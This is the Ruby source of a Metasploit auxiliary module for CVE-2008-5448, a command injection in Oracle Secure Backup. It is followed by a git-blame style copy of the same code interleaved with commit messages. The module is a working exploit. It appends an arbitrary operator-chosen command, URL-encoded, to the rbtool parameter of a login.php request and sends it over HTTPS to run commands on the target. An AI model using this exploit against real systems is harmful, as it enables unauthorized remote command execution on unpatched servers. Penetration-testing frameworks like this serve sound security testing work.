metasploit-framework/modules/auxiliary/admin/oracle/osb_execqr.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Oracle Secure Backup exec_qr() Command Injection Vulnerability',
			'Description'    => %q{
					This module exploits a command injection vulnerablility in Oracle Secure Backup version 10.1.0.3 to 10.2.0.2.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					[ 'CVE', '2008-5448' ],
					[ 'OSVDB', '51342' ],
					[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html' ],
					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-003' ],
				],
			'DisclosureDate' => 'Jan 14 2009'))

		register_options(
			[
				Opt::RPORT(443),
				OptString.new('CMD', [ false, "The command to execute.", "cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt" ]),
				OptBool.new('SSL',   [true, 'Use SSL', true]),
			], self.class)
	end

	def run

		r = Rex::Text.rand_text_english(2)

		cmd = datastore['CMD']

		uri = "/login.php?clear=no&ora_osb_lcookie=&ora_osb_bgcookie=#{r}&button=Logout&rbtool="

		req = uri + Rex::Text.uri_encode(cmd)

		print_status("Sending command: #{datastore['CMD']}...")

		res = send_request_raw({'uri' => req,},5)

		print_status("Done.")

	end
end
added aux module osb_execqr.rb and exploit module osb_ndmp_auth.rb. git-svn-id: file:///home/svn/framework3/trunk@6248 4d416f70-5f16-0410-b530-b9f4589650da 2009-02-23 16:26:00 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
Fix up the boilerplate comment to use a better url 2012-02-21 01:40:50 +00:00			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
added aux module osb_execqr.rb and exploit module osb_ndmp_auth.rb. git-svn-id: file:///home/svn/framework3/trunk@6248 4d416f70-5f16-0410-b530-b9f4589650da 2009-02-23 16:26:00 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Auxiliary`

			`include Msf::Exploit::Remote::HttpClient`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Oracle Secure Backup exec_qr() Command Injection Vulnerability',`
			`'Description' => %q{`
			`This module exploits a command injection vulnerablility in Oracle Secure Backup version 10.1.0.3 to 10.2.0.2.`
			`},`
			`'Author' => [ 'MC' ],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'CVE', '2008-5448' ],`
add osvdb ref git-svn-id: file:///home/svn/framework3/trunk@8536 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-17 18:35:01 +00:00			`[ 'OSVDB', '51342' ],`
added aux module osb_execqr.rb and exploit module osb_ndmp_auth.rb. git-svn-id: file:///home/svn/framework3/trunk@6248 4d416f70-5f16-0410-b530-b9f4589650da 2009-02-23 16:26:00 +00:00			`[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html' ],`
			`[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-003' ],`
			`],`
			`'DisclosureDate' => 'Jan 14 2009'))`

			`register_options(`
			`[`
			`Opt::RPORT(443),`
			`OptString.new('CMD', [ false, "The command to execute.", "cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt" ]),`
			`OptBool.new('SSL', [true, 'Use SSL', true]),`
			`], self.class)`
			`end`

			`def run`

			`r = Rex::Text.rand_text_english(2)`

			`cmd = datastore['CMD']`

			`uri = "/login.php?clear=no&ora_osb_lcookie=&ora_osb_bgcookie=#{r}&button=Logout&rbtool="`
more cleanups git-svn-id: file:///home/svn/framework3/trunk@9212 4d416f70-5f16-0410-b530-b9f4589650da 2010-05-03 17:13:09 +00:00
added aux module osb_execqr.rb and exploit module osb_ndmp_auth.rb. git-svn-id: file:///home/svn/framework3/trunk@6248 4d416f70-5f16-0410-b530-b9f4589650da 2009-02-23 16:26:00 +00:00			`req = uri + Rex::Text.uri_encode(cmd)`
more cleanups git-svn-id: file:///home/svn/framework3/trunk@9212 4d416f70-5f16-0410-b530-b9f4589650da 2010-05-03 17:13:09 +00:00
added aux module osb_execqr.rb and exploit module osb_ndmp_auth.rb. git-svn-id: file:///home/svn/framework3/trunk@6248 4d416f70-5f16-0410-b530-b9f4589650da 2009-02-23 16:26:00 +00:00			`print_status("Sending command: #{datastore['CMD']}...")`

			`res = send_request_raw({'uri' => req,},5)`
more cleanups git-svn-id: file:///home/svn/framework3/trunk@9212 4d416f70-5f16-0410-b530-b9f4589650da 2010-05-03 17:13:09 +00:00
added aux module osb_execqr.rb and exploit module osb_ndmp_auth.rb. git-svn-id: file:///home/svn/framework3/trunk@6248 4d416f70-5f16-0410-b530-b9f4589650da 2009-02-23 16:26:00 +00:00			`print_status("Done.")`
more cleanups git-svn-id: file:///home/svn/framework3/trunk@9212 4d416f70-5f16-0410-b530-b9f4589650da 2010-05-03 17:13:09 +00:00
added aux module osb_execqr.rb and exploit module osb_ndmp_auth.rb. git-svn-id: file:///home/svn/framework3/trunk@6248 4d416f70-5f16-0410-b530-b9f4589650da 2009-02-23 16:26:00 +00:00			`end`
			`end`